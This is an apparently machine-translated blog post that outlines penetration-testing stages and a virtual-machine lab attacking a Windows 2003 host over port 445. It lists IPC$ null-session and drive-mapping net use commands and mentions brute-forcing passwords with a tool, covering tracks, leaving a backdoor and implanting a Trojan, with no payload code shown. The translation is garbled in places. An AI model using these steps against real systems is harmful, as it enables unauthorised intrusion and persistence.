当前位置:网站首页>Simple process of penetration test
Simple process of penetration test
2022-07-05 13:54:00 【Cwxh0125】
Simple process
One . information gathering
nslookup whois
Two . Scan for leaks
namp=IP Range port 80 (iss,apache, What website )
Advanced scanning : Such as iss Loophole Scanning for website vulnerabilities
3、 ... and . Exploit
Four . Raise the right (shell Environmental Science , Desktop Environment , Highest authority ))
Manually test port number open : talent IP Address Test port
5、 ... and . Destroy the bodies
6、 ... and . leave oneself a way out
7、 ... and . Penetration test report
Practice
Open two virtual machines
win2003 The server 10.1.1.2
winxp staff 10.1.1.1
use xp attack 2003
First, two virtual machines should be able to communicate To configure IP In the same LAN
After the configuration is completed, try xp On ping once 2003 ping success
Next The attack
attack 445 attack ( Shared port )
First step : Port scanning
Manual scanning
telnet IP port The following situations represent that the corresponding port is open
Automatic scanning Use scanport
You can see xp and 2003 Both virtual machines are turned on 445 port
445 One of the exploits ipc$:
net use Used to connect your computer to shared resources ( Establish disk mapping ), Or disconnect the computer from shared resources ( Delete disk mapping ), When using this command without options , It lists the computer connections .
1) Make an empty connection :
net use \\IP\ipc$ "" /user:"" ( Be sure to pay attention to : This line of command contains 3 A space )
2) Establish a non empty connection :
net use \\IP\ipc$ " password " /user:" user name " ( There are also 3 A space )
3) Map default share :
net use z: \\IP\c$ " password " /user:" user name " ( You can put the other party's c The disk maps to its own z disc , And so on )
If you've established a goal ipc$, You can use IP+ Disk character +$ visit , Specific commands net use z: \\IP\c$
4) Delete one ipc$ Connect
net use \\IP\ipc$ /del
5) Delete shared mapping
net use c: /del Delete mapped c disc , And so on
net use * /del Delete all , There will be a prompt to press y confirm
3 View the shared resources of the remote host ( But you don't see the default share )
net view \\IP
Brutally crack the system password 445
Using tools ntscan
take user And the password burst out You can go through net use \\IP\ipc$ " password " /user:" user name " To make a connection
After successful connection, the back door can be left
Make a Trojan
copy Implant Trojans
边栏推荐
- Zhubo Huangyu: it's really bad not to understand these gold frying skills
- UE源码阅读[1]---由问题入手UE中的延迟渲染
- UE source code reading [1]--- starting with problems delayed rendering in UE
- Selenium crawls Baidu pictures
- Usage, installation and use of TortoiseSVN
- Anchor navigation demo
- Win10 - lightweight gadget
- 【云资源】云资源安全管理用什么软件好?为什么?
- Matlab learning 2022.7.4
- Can graduate students not learn English? As long as the score of postgraduate entrance examination English or CET-6 is high!
猜你喜欢
Xampp configuring multiple items
[machine learning notes] several methods of splitting data into training sets and test sets
Laravel dompdf exports PDF, and the problem of Chinese garbled code is solved
[cloud resources] what software is good for cloud resource security management? Why?
Mmseg - Mutli view time series data inspection and visualization
几款分布式数据库的对比
内网穿透工具 netapp
【华南理工大学】考研初试复试资料分享
瑞能实业IPO被终止:年营收4.47亿 曾拟募资3.76亿
RK3566添加LED
随机推荐
[South China University of technology] information sharing of postgraduate entrance examination and re examination
The real king of caching, Google guava is just a brother
链表(简单)
MySQL if else use case use
【云资源】云资源安全管理用什么软件好?为什么?
Elfk deployment
Jasypt configuration file encryption | quick start | actual combat
2022年机修钳工(高级)考试题模拟考试题库模拟考试平台操作
Simple PHP paging implementation
Prefix, infix, suffix expression "recommended collection"
PHP generate Poster
ZABBIX monitoring
Attack and defense world crypto WP
通讯录(链表实现)
真正的缓存之王,Google Guava 只是弟弟
2022 machine fitter (Advanced) test question simulation test question bank simulation test platform operation
Redis6 master-slave replication and clustering
Laravel generate entity
Jetpack Compose入门到精通
Brief introduction to revolutionary neural networks